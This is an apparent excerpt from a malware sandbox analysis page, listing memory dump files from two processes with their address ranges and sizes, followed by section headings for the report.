memory/4616-19-0x00007FFCA5430000-0x00007FFCA5EF1000-memory.dmp

Filesize
10.8MB

Download
memory/4616-18-0x00007FFCA5433000-0x00007FFCA5435000-memory.dmp

Filesize
8KB

Download
memory/4616-16-0x00007FFCA5430000-0x00007FFCA5EF1000-memory.dmp

Filesize
10.8MB

Download
memory/4616-4-0x00007FFCA5433000-0x00007FFCA5435000-memory.dmp

Filesize
8KB

Download
memory/4616-10-0x00000237C3C60000-0x00000237C3C82000-memory.dmp

Filesize
136KB

Download
memory/4940-39-0x0000000005710000-0x0000000005A64000-memory.dmp

Filesize
3.3MB

Download
memory/4940-29-0x0000000004EC0000-0x0000000004F26000-memory.dmp

Filesize
408KB

Download
memory/4940-41-0x0000000005C10000-0x0000000005C2E000-memory.dmp

Filesize
120KB

Download
memory/4940-42-0x0000000005C50000-0x0000000005C9C000-memory.dmp

Filesize
304KB

Download
memory/4940-43-0x0000000007460000-0x0000000007ADA000-memory.dmp

Filesize
6.5MB

Download
memory/4940-44-0x00000000061C0000-0x00000000061DA000-memory.dmp

Filesize
104KB

Download
memory/4940-46-0x0000000006E60000-0x0000000006E82000-memory.dmp

Filesize
136KB

Download
memory/4940-45-0x0000000006ED0000-0x0000000006F66000-memory.dmp

Filesize
600KB

Download
memory/4940-47-0x0000000008090000-0x0000000008634000-memory.dmp

Filesize
5.6MB

Download
memory/4940-28-0x0000000004DE0000-0x0000000004E46000-memory.dmp

Filesize
408KB

Download
memory/4940-49-0x0000000008640000-0x000000000B813000-memory.dmp

Filesize
49.8MB

Download
memory/4940-27-0x0000000004D40000-0x0000000004D62000-memory.dmp

Filesize
136KB

Download
memory/4940-26-0x0000000004F60000-0x0000000005588000-memory.dmp

Filesize
6.2MB

Download
memory/4940-25-0x00000000022F0000-0x0000000002326000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads